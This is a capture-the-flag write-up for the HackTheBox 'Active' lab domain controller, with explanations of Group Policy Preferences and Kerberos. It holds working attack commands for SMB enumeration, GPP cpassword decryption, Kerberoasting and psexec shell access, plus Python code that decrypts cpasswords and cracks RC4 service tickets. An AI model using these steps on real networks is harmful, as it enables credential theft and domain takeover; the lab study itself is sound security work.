
HACKTHEBOX - ACTIVE

Link: https://app.hackthebox.eu/machines/Active

Enumeration

We start with our usual nmap scan:

PORT      STATE SERVICE       VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-27 11:13:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC

SMB Enumeration

We use crackmapexec to enumerate shares over a null session (empty username and password):

crackmapexec smb 10.10.10.100 --shares -u '' -p ''

SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users


The null session is accepted, and the non-default share Replication stands out: it is the only share we can read without credentials. Its name, and the Policies\{GUID} layout below, suggest it is a copy of SYSVOL, so we pull everything:

smbclient --no-pass //10.10.10.100/Replication

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (5.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.9 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (7.5 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \> exit

The download gives us the domain's GPO folders (the two GUIDs are the well-known Default Domain Policy and Default Domain Controllers Policy). One file, MACHINE\Preferences\Groups\Groups.xml, is especially interesting:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The cpassword attribute holds an encrypted password for the account active.htb\SVC_TGS: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPP, GPO

A few quick definitions before moving on:

  • Group Policy Preferences (GPP) are a set of client-side extensions (CSEs), introduced with Windows Server 2008, that push "preference" settings to domain-joined Windows clients: local users and groups, drive mappings, scheduled tasks, services, printers, data sources, and so on.

  • A GPO (Group Policy Object) is the container that holds policy (and preference) settings for users and computers in an Active Directory domain. GPOs are stored on the domain controllers and applied at computer start-up and user logon, then re-applied at the refresh interval.

Policy settings are enforced: the user cannot change them. Preference settings are written to the client but not enforced, so the user can change them afterwards.

Both live in the domain controller's SYSVOL share, in the GPO's folder. Preferences are stored as XML files under MACHINE\Preferences (or USER\Preferences): Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml. Policy settings use other formats in the same folder, for example Registry.pol and Microsoft\Windows NT\SecEdit\GptTmpl.inf, both of which appear in the download above.

In summary:

Feature                       GPP                                    GPO
Scope                         Sites, domains, organizational units   Sites, domains, organizational units
Priority                      Applied after policy settings          Applied before preferences
Storage                       SYSVOL, Preferences\*.xml              SYSVOL, Registry.pol / GptTmpl.inf
Year introduced               Windows Server 2008 (2008)             Windows 2000 (2000)
Settings modifiable by user?  Yes                                    No

Groups.xml and SYSVOL share

Groups.xml is the "Local Users and Groups" preference. It sits in the GPO's folder in the SYSVOL share.

SYSVOL is readable by every authenticated domain user by default, but not by guest or anonymous sessions, which is why the anonymously readable Replication copy matters on this box.

Groups.xml is used to create or update local user accounts on the targeted machines (including their password, as here) and to add domain users or groups to local groups.

Other preference files carry credentials with the same cpassword mechanism: Services.xml (service accounts), ScheduledTasks.xml (task run-as accounts), DataSources.xml, Drives.xml (mapped-drive credentials) and Printers.xml (printer connections).

The gpp-decrypt tool (shipped with Kali) decrypts it:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
GPP vulnerability

The cpassword value is encrypted with AES-256-CBC. Without the key, that would be unbreakable.

However, the key is static (the same in every domain in the world) and Microsoft published it in the MS-GPPREF specification, so anyone who can read the XML can decrypt every cpassword ever written.

Microsoft's fix, MS14-025 (KB2962486), only removes the ability to create or edit preferences that contain a password. Existing Groups.xml files with a cpassword stay on SYSVOL until an administrator deletes them, which is exactly the situation here (the file was last changed in 2018). Auditing SYSVOL for cpassword attributes is therefore still a necessary check.

More information: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025
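As an added example (not part of the original writeup), the following Python shows what gpp-decrypt does under the hood, with no third-party dependencies: AES is written out in full so the block runs anywhere, the key is the one published in MS-GPPREF, and the embedded XML is the Groups.xml pulled from the Replication share above. It also includes a small scanner that pulls cpassword attributes out of any preference XML file, which is the check a defender would run over SYSVOL after MS14-025. In practice you would use gpp-decrypt or a crypto library rather than hand-rolled AES.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF 2.2.1.1.4: identical in every
# domain on earth, which is the whole vulnerability.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _xtime(a):  # multiply by x in GF(2^8) modulo the AES polynomial
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a


def _gmul(a, b):  # GF(2^8) multiplication
    r = 0
    while b:
        r ^= a if b & 1 else 0
        a, b = _xtime(a), b >> 1
    return r


def _build_sboxes():  # S-box from its definition: field inverse, then affine map
    sbox = [0] * 256
    for x in range(256):
        t, s = next((y for y in range(1, 256) if _gmul(x, y) == 1), 0), 0x63
        for _ in range(5):  # s = inv ^ rotl(inv,1) ^ ... ^ rotl(inv,4) ^ 0x63
            s ^= t
            t = ((t << 1) | (t >> 7)) & 0xFF
        sbox[x] = s
    inv_sbox = [0] * 256
    for x, s in enumerate(sbox):
        inv_sbox[s] = x
    return sbox, inv_sbox


SBOX, INV_SBOX = _build_sboxes()
_INV_MIX = ((14, 11, 13, 9), (9, 14, 11, 13), (13, 9, 14, 11), (11, 13, 9, 14))


def _expand_key(key):  # FIPS-197 key schedule, 32-byte key -> 15 round keys
    w, rcon = [list(key[i:i + 4]) for i in range(0, 32, 4)], 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:  # RotWord + SubWord + Rcon
            t, rcon = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]], _xtime(rcon)
        elif i % 8 == 4:  # extra SubWord specific to 256-bit keys
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _decrypt_block(block, rk):  # FIPS-197 InvCipher; state is column-major (byte r + 4c)
    def inv_shift_rows(s):
        return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]

    def inv_mix_columns(s):
        return [_gmul(s[4 * c], m[0]) ^ _gmul(s[4 * c + 1], m[1]) ^ _gmul(s[4 * c + 2], m[2])
                ^ _gmul(s[4 * c + 3], m[3]) for c in range(4) for m in _INV_MIX]

    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, 0, -1):
        s = [INV_SBOX[b] for b in inv_shift_rows(s)]
        s = inv_mix_columns([b ^ k for b, k in zip(s, rk[rnd])])
    s = [INV_SBOX[b] for b in inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rk[0]))


def gpp_decrypt(cpassword: str) -> str:
    """cpassword -> clear text: base64 (padding stripped), AES-256-CBC, zero IV, PKCS#7, UTF-16LE."""
    ct = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not ct or len(ct) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    rk, prev, pt = _expand_key(GPP_KEY), bytes(16), b""
    for i in range(0, len(ct), 16):
        pt += bytes(x ^ y for x, y in zip(_decrypt_block(ct[i:i + 16], rk), prev))
        prev = ct[i:i + 16]
    pad = pt[-1]
    if not 1 <= pad <= 16 or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: corrupt cpassword")
    return pt[:-pad].decode("utf-16-le")


def find_cpasswords(xml_data):
    """Yield (account, cpassword) for every element carrying a cpassword attribute.
    Works for Groups.xml and the other preference files (Services, ScheduledTasks, Drives, ...)."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    for el in ET.fromstring(xml_data).iter():
        if "cpassword" in el.attrib:
            a = el.attrib
            yield a.get("userName") or a.get("runAs") or a.get("accountName") or "?", a["cpassword"]


# The Groups.xml pulled from the Replication share above (backslashes escaped for Python).
GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" '
    'changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" '
    'newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOs'
    'QbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" '
    'userName="active.htb\\SVC_TGS"/></User>\n</Groups>')

if __name__ == "__main__":
    for who, cp in find_cpasswords(GROUPS_XML):
        print(f"{who}: {gpp_decrypt(cp)}")
```

Point find_cpasswords at every *.xml under \\<dc>\SYSVOL\<domain>\Policies (or a Replication-style copy) and you have the same audit that Get-GPPPassword performs; any hit is a credential that MS14-025 did not remove and that every domain user can read.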

We can try Evil-WinRM with these credentials, but without success: no WinRM port (5985/5986) appeared in the scan.

We re-enumerate SMB with the new account:

crackmapexec smb 10.10.10.100 --shares -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ

The Users share is now readable, and the user flag is in the SVC_TGS Desktop folder.

Privilege escalation

Request a TGS

The account name SVC_TGS hints at a TGS, in other words at Kerberoasting. With impacket's GetUserSPNs.py we list the user accounts that have a servicePrincipalName set; for each of them, any domain user can ask the KDC for a service ticket:

TGS

The Ticket-Granting Service (TGS) is a component of the Kerberos Key Distribution Center (KDC) that issues a service ticket when a principal requests a connection to a Kerberos service. To obtain a service ticket in an Active Directory domain, you must first have a Ticket-Granting Ticket (TGT) for that domain.

The TGS exchange happens in two main steps:

  1. The client sends a request to the KDC to obtain a ticket for the server. The client presents the TGT, a Kerberos authenticator, and the service principal name (SPN).

  2. The KDC validates the TGT and authenticator. If they are valid, the KDC returns a service ticket and session key that the client can use to encrypt communication with the server.

GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-07-27 13:01:52.365747

We see one SPN, active/CIFS:445, and it is registered on the Administrator account itself (which is also a member of Group Policy Creator Owners).

CIFS

CIFS (Common Internet File System) is a network file system protocol used to provide shared access to files and printers between machines on a network.

The SPN itself matters little. What matters is the account behind it: the service ticket for active/CIFS:445 is encrypted with a key derived from the Administrator account's password, so cracking the ticket offline gives us that password.

Normally we would have to request a TGT and then the TGS; impacket does both for us with -request (it authenticates as SVC_TGS, asks the KDC for a ticket for each SPN and prints it in hashcat/john format).

Any authenticated domain user can do this, and the KDC cannot tell it apart from a legitimate request. That is what makes Kerberoasting attractive: it needs only a valid domain account, and the cracking happens entirely offline.

GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-07-27 13:01:52.365747



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$37d4a98e9986e9496d014bede8980c33$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
Kerberos encryption

The ticket could be cracked because it is encrypted under a key derived from the Administrator account's password, and because of the encryption type used: the $krb5tgs$23$ prefix identifies etype 23, RC4-HMAC (RFC 4757), whose key is simply the NT hash (MD4 of the UTF-16LE password), with no salt and no iteration count. Each guess costs one MD4, two HMAC-MD5 and one RC4 pass, which is why hashcat and john go through rockyou in seconds. The AES etypes (17 and 18) derive the key with PBKDF2 (4096 iterations, salted with realm and principal name) and crack orders of magnitude more slowly; an account with AES enabled in msDS-SupportedEncryptionTypes, on a KDC that refuses RC4, leaves the attacker only AES tickets.

RC4 is a stream cipher designed in 1987 that takes a variable-length key (40 to 128 bits in most deployments). It was used in SSL/TLS (prohibited since RFC 7465), in WEP and WPA-TKIP, and in Kerberos, where Microsoft has deprecated it in favour of AES.

Impacket version

If you get this error message:

[-] type object 'CCache' has no attribute 'parseFile'

You have an old impacket version (<0.10). Update the impacket suite.

Cracking the TGS

This line is not a password hash as such: it is the encrypted part of the service ticket (a 16-byte checksum followed by the ciphertext), encrypted with the Administrator account's key. Guessing passwords offline and checking which one decrypts it correctly yields the account's clear-text password.

We then have 2 ways to crack it:

  1. With hashcat:
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$37d4a98e9986e9496d014bede8980c33$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:Ticketmaster1968
  2. With john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2023-07-28 02:14) 0.3067g/s 3233Kp/s 3233Kc/s 3233KC/s Tiffani1432..Thanongsuk_police
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
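The following is an added example, not part of the original writeup: a self-contained model of what hashcat -m 13100 and john's krb5tgs format do with the line above, covering the TGS request, Kerberos encryption and cracking sections together. It reimplements MD4 (for the NT hash), RC4 and the RFC 4757 RC4-HMAC encryption and decryption, builds a constructed stand-in for the ticket GetUserSPNs.py printed (encrypted under Ticketmaster1968, with a placeholder plaintext instead of a real DER-encoded EncTicketPart and a fixed confounder instead of a random one, neither of which changes the cracking logic), and cracks it with a three-word list taken from the john output. MD4 is written out because hashlib's md4 is frequently disabled under OpenSSL 3.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KRB_USAGE_TGS_REP_TICKET = 2  # key usage number of a service ticket's enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | ((x ^ MASK) & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(48):
            j, rnd = i % 16, i // 16
            if rnd == 0:
                f, k, s, add = F(b, c, d), j, (3, 7, 11, 19)[j % 4], 0
            elif rnd == 1:
                f, k, s, add = G(b, c, d), (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:
                f, k, s, add = H(b, c, d), (0, 2, 1, 3)[j // 4] + (0, 8, 4, 12)[j % 4], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f + X[k] + add) & MASK, s), b, c  # rotate (a,b,c,d)
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:  # NT hash = MD4(UTF-16LE(password)): no salt, no iterations
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption (etype 23): returns checksum || RC4(confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes):
    """Inverse of the above; returns the plaintext, or None when the checksum fails (wrong key)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum, edata = blob[:16], blob[16:]
    data = rc4(_hmac_md5(k1, checksum), edata)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), checksum) else None


def hashcat_line(user: str, realm: str, spn: str, blob: bytes) -> str:
    """Same layout as hashcat -m 13100 / john krb5tgs: 16-byte checksum, then the ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack(line: str, wordlist, usage=KRB_USAGE_TGS_REP_TICKET):
    """One MD4, two HMAC-MD5 and one RC4 pass per candidate: all that RC4 costs an attacker."""
    head, _meta, rest = line.split("*")
    if head != "$krb5tgs$23$":
        raise ValueError("only etype 23 (RC4-HMAC) tickets are handled here")
    _, checksum, edata = rest.split("$")
    blob = bytes.fromhex(checksum) + bytes.fromhex(edata)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), usage, blob) is not None:
            return candidate
    return None


def build_sample_line(password: str = "Ticketmaster1968", confounder: bytes = bytes(8)) -> str:
    """Constructed stand-in for the ticket above: placeholder plaintext, fixed confounder."""
    blob = rc4_hmac_encrypt(nt_hash(password), KRB_USAGE_TGS_REP_TICKET, b"constructed EncTicketPart", confounder)
    return hashcat_line("Administrator", "ACTIVE.HTB", "active/CIFS:445", blob)


if __name__ == "__main__":
    line = build_sample_line()
    print(line)
    print(crack(line, ["Tiffani1432", "Thanongsuk_police", "Ticketmaster1968"]))
```

The crack loop is exactly why the etype matters: replacing nt_hash with the AES key derivation (PBKDF2-HMAC-SHA1, 4096 iterations, salted with realm and principal) would make each candidate thousands of times more expensive, and the checksum verification would no longer be a single HMAC-MD5.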

Gettin' a shell


We can then get the root flag via the Users share, but we can also get a shell because we have rights in the ADMIN$ share:

ADMIN$ share

ADMIN$ is a hidden administrative share that Windows creates by default; it maps to the Windows directory (%SystemRoot%). The disk volumes are exposed by C$ and one share per drive letter.

Only members of the local Administrators group can open these shares, and psexec-style tools need write access to ADMIN$ to drop their service binary, which is what crackmapexec's "(Pwn3d!)" flag indicates below.

crackmapexec smb 10.10.10.100 --shares -u 'administrator' -p 'Ticketmaster1968'
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.100 445 DC C$ READ,WRITE Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ,WRITE Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ

We can then get a shell with impacket's psexec.py:

psexec.py administrator@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file wEhOvcTJ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service xJLl on 10.10.10.100.....
[*] Starting service xJLl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Since WinRM was not reachable, psexec over SMB gives us a shell on the domain controller anyway (the service it installs runs as SYSTEM), and with it the root flag.